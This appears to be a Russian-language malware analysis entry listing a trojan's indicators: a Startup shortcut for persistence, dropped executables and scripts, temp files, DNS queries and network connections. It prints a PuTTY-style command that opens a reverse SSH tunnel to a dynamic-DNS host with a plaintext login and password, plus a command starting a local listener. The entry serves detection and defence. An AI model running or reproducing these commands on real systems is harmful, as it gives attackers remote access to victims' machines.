Техническая информация
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\Mozila.lnk
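- 'C:\Default\ComSystem.exe' -ssh -R 7760:127.0.0.2:22 55http.myvnc.com -l 55http -pw 2n16122N
  (Примечание: судя по параметрам -ssh, -R, -l, -pw и файлу PUTTY.RND в списке ниже, ComSystem.exe — по-видимому, SSH-клиент семейства PuTTY. Параметр -R 7760:127.0.0.2:22 задаёт обратный проброс порта 7760 удалённого узла на локальный адрес 127.0.0.2:22, а логин и пароль передаются в командной строке открытым текстом, поэтому видны в журналах создания процессов.)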
- 'C:\Default\Surrogate.exe' -d -t -l -e0.0.0.0 -i127.0.0.2 -p22 -a
- '<SYSTEM32>\wscript.exe' "C:\Default\Surrogate.vbe"
- C:\Default\Surrogate.vbe
- C:\Default\Surrogate.exe
- %TEMP%\~SB9.tmp
- C:\Default\ComSystem.exe
- <LS_APPDATA>\PUTTY.RND
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\supersize[1].pl
- C:\Default\image hosting.url
- %TEMP%\image hosting.0001
- %TEMP%\LSB3.tmp
- %TEMP%\~SB4.tmp
- %TEMP%\LSB1.tmp
- %TEMP%\LSB2.tmp
- %TEMP%\~SB7.tmp
- %TEMP%\~SB8.tmp
- %TEMP%\~SB5.tmp
- %TEMP%\~SB6.tmp
- %TEMP%\f6d12340-ca7f-11e3-4823-0002ba3e0029\x64.exe
- %TEMP%\~SB4.tmp
- %TEMP%\LSB3.tmp
- %TEMP%\LSB2.tmp
- %TEMP%\~SB6.tmp
- %TEMP%\~SB8.tmp
- %TEMP%\LSB1.tmp
- %TEMP%\~SB5.tmp
- %TEMP%\~SB9.tmp
- из %TEMP%\~SB7.tmp в %TEMP%\f6d12340-ca7f-11e3-4823-0002ba3e0029\x64.exe
- 'www.us#.com':80
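- '55####.myvnc.com':22 (имя частично замаскировано; по-видимому, это тот же узел, что 55http.myvnc.com в командной строке ComSystem.exe выше)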
- 'localhost':1036
- www.us#.com/supersize.pl?se######################
- DNS ASK www.us#.com
- DNS ASK 55####.myvnc.com
- ClassName: 'MS_AutodialMonitor' WindowName: '(null)'
- ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
- ClassName: '' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'